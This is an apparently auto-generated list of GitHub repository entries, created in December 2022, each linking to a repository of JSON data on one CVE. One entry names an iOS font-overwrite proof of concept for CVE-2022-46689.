**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29891](https://github.com/Live-Hack-CVE/CVE-2021-29891) create time: 2022-12-26T07:30:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21139](https://github.com/Live-Hack-CVE/CVE-2022-21139) create time: 2022-12-26T08:18:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21549 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21549](https://github.com/Live-Hack-CVE/CVE-2022-21549) create time: 2022-12-26T08:18:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21541 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21541](https://github.com/Live-Hack-CVE/CVE-2022-21541) create time: 2022-12-26T08:18:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21540 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21540](https://github.com/Live-Hack-CVE/CVE-2022-21540) create time: 2022-12-26T08:18:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21160 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21160](https://github.com/Live-Hack-CVE/CVE-2022-21160) create time: 2022-12-26T08:18:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21197](https://github.com/Live-Hack-CVE/CVE-2022-21197) create time: 2022-12-26T08:18:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21172 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21172](https://github.com/Live-Hack-CVE/CVE-2022-21172) create time: 2022-12-26T08:18:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21212 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21212](https://github.com/Live-Hack-CVE/CVE-2022-21212) create time: 2022-12-26T08:18:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21240 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21240](https://github.com/Live-Hack-CVE/CVE-2022-21240) create time: 2022-12-26T08:18:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25841](https://github.com/Live-Hack-CVE/CVE-2022-25841) create time: 2022-12-26T08:18:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25899 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25899](https://github.com/Live-Hack-CVE/CVE-2022-25899) create time: 2022-12-26T08:18:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2886](https://github.com/Live-Hack-CVE/CVE-2022-2886) create time: 2022-12-26T08:18:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25999](https://github.com/Live-Hack-CVE/CVE-2022-25999) create time: 2022-12-26T08:18:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26017](https://github.com/Live-Hack-CVE/CVE-2022-26017) create time: 2022-12-26T08:17:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36224](https://github.com/Live-Hack-CVE/CVE-2022-36224) create time: 2022-12-26T08:17:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36171](https://github.com/Live-Hack-CVE/CVE-2022-36171) create time: 2022-12-26T08:17:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27500](https://github.com/Live-Hack-CVE/CVE-2022-27500) create time: 2022-12-26T08:17:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35213](https://github.com/Live-Hack-CVE/CVE-2022-35213) create time: 2022-12-26T08:17:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35975 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35975](https://github.com/Live-Hack-CVE/CVE-2022-35975) create time: 2022-12-26T08:17:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35008 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35008](https://github.com/Live-Hack-CVE/CVE-2022-35008) create time: 2022-12-26T08:17:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35007 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35007](https://github.com/Live-Hack-CVE/CVE-2022-35007) create time: 2022-12-26T08:17:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35010](https://github.com/Live-Hack-CVE/CVE-2022-35010) create time: 2022-12-26T08:17:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35009 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35009](https://github.com/Live-Hack-CVE/CVE-2022-35009) create time: 2022-12-26T08:17:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35011](https://github.com/Live-Hack-CVE/CVE-2022-35011) create time: 2022-12-26T08:17:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35012](https://github.com/Live-Hack-CVE/CVE-2022-35012) create time: 2022-12-26T08:16:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35013 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35013](https://github.com/Live-Hack-CVE/CVE-2022-35013) create time: 2022-12-26T08:16:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26374 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26374](https://github.com/Live-Hack-CVE/CVE-2022-26374) create time: 2022-12-26T08:16:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28696](https://github.com/Live-Hack-CVE/CVE-2022-28696) create time: 2022-12-26T08:16:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37254 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37254](https://github.com/Live-Hack-CVE/CVE-2022-37254) create time: 2022-12-26T08:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36579 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36579](https://github.com/Live-Hack-CVE/CVE-2022-36579) create time: 2022-12-26T08:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1690](https://github.com/Live-Hack-CVE/CVE-2012-1690) create time: 2022-12-26T06:51:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0578](https://github.com/Live-Hack-CVE/CVE-2012-0578) create time: 2022-12-26T06:46:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1705](https://github.com/Live-Hack-CVE/CVE-2012-1705) create time: 2022-12-26T06:46:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1688 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1688](https://github.com/Live-Hack-CVE/CVE-2012-1688) create time: 2022-12-26T06:46:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0572 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0572](https://github.com/Live-Hack-CVE/CVE-2012-0572) create time: 2022-12-26T06:46:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0540 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0540](https://github.com/Live-Hack-CVE/CVE-2012-0540) create time: 2022-12-26T06:46:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-0574 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-0574](https://github.com/Live-Hack-CVE/CVE-2012-0574) create time: 2022-12-26T06:46:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1689 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1689](https://github.com/Live-Hack-CVE/CVE-2012-1689) create time: 2022-12-26T06:46:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1697 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1697](https://github.com/Live-Hack-CVE/CVE-2012-1697) create time: 2022-12-26T06:45:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1555](https://github.com/Live-Hack-CVE/CVE-2013-1555) create time: 2022-12-26T06:52:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2376 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2376](https://github.com/Live-Hack-CVE/CVE-2013-2376) create time: 2022-12-26T06:52:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3804](https://github.com/Live-Hack-CVE/CVE-2013-3804) create time: 2022-12-26T06:51:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1532 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1532](https://github.com/Live-Hack-CVE/CVE-2013-1532) create time: 2022-12-26T06:51:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1526 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1526](https://github.com/Live-Hack-CVE/CVE-2013-1526) create time: 2022-12-26T06:51:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1544 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1544](https://github.com/Live-Hack-CVE/CVE-2013-1544) create time: 2022-12-26T06:51:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0371 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0371](https://github.com/Live-Hack-CVE/CVE-2013-0371) create time: 2022-12-26T06:51:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0368 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0368](https://github.com/Live-Hack-CVE/CVE-2013-0368) create time: 2022-12-26T06:51:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0367 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0367](https://github.com/Live-Hack-CVE/CVE-2013-0367) create time: 2022-12-26T06:51:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1512 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1512](https://github.com/Live-Hack-CVE/CVE-2013-1512) create time: 2022-12-26T06:51:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-5891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-5891](https://github.com/Live-Hack-CVE/CVE-2013-5891) create time: 2022-12-26T06:51:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3809](https://github.com/Live-Hack-CVE/CVE-2013-3809) create time: 2022-12-26T06:49:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3805](https://github.com/Live-Hack-CVE/CVE-2013-3805) create time: 2022-12-26T06:49:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3808 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3808](https://github.com/Live-Hack-CVE/CVE-2013-3808) create time: 2022-12-26T06:49:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3839](https://github.com/Live-Hack-CVE/CVE-2013-3839) create time: 2022-12-26T06:49:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6520 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6520](https://github.com/Live-Hack-CVE/CVE-2014-6520) create time: 2022-12-26T06:52:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6484 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6484](https://github.com/Live-Hack-CVE/CVE-2014-6484) create time: 2022-12-26T06:52:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6505 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6505](https://github.com/Live-Hack-CVE/CVE-2014-6505) create time: 2022-12-26T06:52:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6564 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6564](https://github.com/Live-Hack-CVE/CVE-2014-6564) create time: 2022-12-26T06:52:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2494](https://github.com/Live-Hack-CVE/CVE-2014-2494) create time: 2022-12-26T06:52:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-4207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-4207](https://github.com/Live-Hack-CVE/CVE-2014-4207) create time: 2022-12-26T06:52:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-4287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-4287](https://github.com/Live-Hack-CVE/CVE-2014-4287) create time: 2022-12-26T06:52:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6464](https://github.com/Live-Hack-CVE/CVE-2014-6464) create time: 2022-12-26T06:52:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0433](https://github.com/Live-Hack-CVE/CVE-2015-0433) create time: 2022-12-26T06:52:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0391 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0391](https://github.com/Live-Hack-CVE/CVE-2015-0391) create time: 2022-12-26T06:52:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0441 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0441](https://github.com/Live-Hack-CVE/CVE-2015-0441) create time: 2022-12-26T06:52:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-3495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-3495](https://github.com/Live-Hack-CVE/CVE-2016-3495) create time: 2022-12-26T06:51:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5507](https://github.com/Live-Hack-CVE/CVE-2016-5507) create time: 2022-12-26T06:51:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-5625 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-5625](https://github.com/Live-Hack-CVE/CVE-2016-5625) create time: 2022-12-26T06:50:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3590](https://github.com/Live-Hack-CVE/CVE-2021-3590) create time: 2022-12-26T06:53:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3639 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3639](https://github.com/Live-Hack-CVE/CVE-2021-3639) create time: 2022-12-26T06:53:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3586](https://github.com/Live-Hack-CVE/CVE-2021-3586) create time: 2022-12-26T06:53:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33126](https://github.com/Live-Hack-CVE/CVE-2021-33126) create time: 2022-12-26T06:49:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3968](https://github.com/Live-Hack-CVE/CVE-2021-3968) create time: 2022-12-26T06:49:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20316 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20316](https://github.com/Live-Hack-CVE/CVE-2021-20316) create time: 2022-12-26T06:48:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3701 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3701](https://github.com/Live-Hack-CVE/CVE-2021-3701) create time: 2022-12-26T06:47:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3917 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3917](https://github.com/Live-Hack-CVE/CVE-2021-3917) create time: 2022-12-26T06:47:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3839](https://github.com/Live-Hack-CVE/CVE-2021-3839) create time: 2022-12-26T06:46:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3875](https://github.com/Live-Hack-CVE/CVE-2021-3875) create time: 2022-12-26T06:46:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3905 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3905](https://github.com/Live-Hack-CVE/CVE-2021-3905) create time: 2022-12-26T06:44:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3763](https://github.com/Live-Hack-CVE/CVE-2021-3763) create time: 2022-12-26T06:44:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3690 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3690](https://github.com/Live-Hack-CVE/CVE-2021-3690) create time: 2022-12-26T06:44:41Z

**Proof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.** : [zhuowei/WDBFontOverwrite](https://github.com/zhuowei/WDBFontOverwrite) create time: 2022-12-26T06:56:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24375 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24375](https://github.com/Live-Hack-CVE/CVE-2022-24375) create time: 2022-12-26T06:55:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25231 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25231](https://github.com/Live-Hack-CVE/CVE-2022-25231) create time: 2022-12-26T06:55:35Z

